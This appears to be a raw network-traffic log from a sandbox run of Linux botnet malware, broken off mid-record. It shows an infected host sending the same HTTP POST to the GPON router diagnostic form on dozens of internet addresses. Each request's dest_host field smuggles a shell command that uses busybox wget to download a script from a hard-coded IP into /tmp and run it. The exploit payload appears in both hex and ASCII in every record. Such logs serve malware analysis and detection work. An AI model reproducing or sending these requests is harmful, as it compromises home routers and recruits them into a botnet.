                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1792192.168.2.1333472118.75.50.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818572044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1793192.168.2.1345136118.197.179.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818592072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1794192.168.2.1356052118.84.140.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818749905 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1795192.168.2.1353098212.106.157.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818768024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1796192.168.2.13397525.128.0.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818768024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1797192.168.2.135101842.80.137.28443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818809986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1798192.168.2.1358500212.134.149.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818811893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1799192.168.2.1332954118.215.229.163443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818979025 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1800192.168.2.13368925.188.20.248443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.818999052 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1801192.168.2.1336432118.229.183.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819004059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1802192.168.2.1334596118.143.230.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819020033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1803192.168.2.13327765.58.154.26443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819048882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1804192.168.2.1340162109.27.17.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819051027 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1805192.168.2.13361905.56.116.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819072962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1806192.168.2.1348270212.152.140.88443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819087029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1807192.168.2.1333974118.12.143.172443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819087029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1808192.168.2.134390042.140.136.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.819113970 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1809192.168.2.1348598118.47.223.29443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820487976 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1810192.168.2.1346578109.222.43.172443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820491076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1811192.168.2.1343778109.65.245.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820549965 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1812192.168.2.1333710109.147.30.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820554018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1813192.168.2.1350868109.221.157.222443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820586920 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1814192.168.2.1337688212.76.228.117443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.820590019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
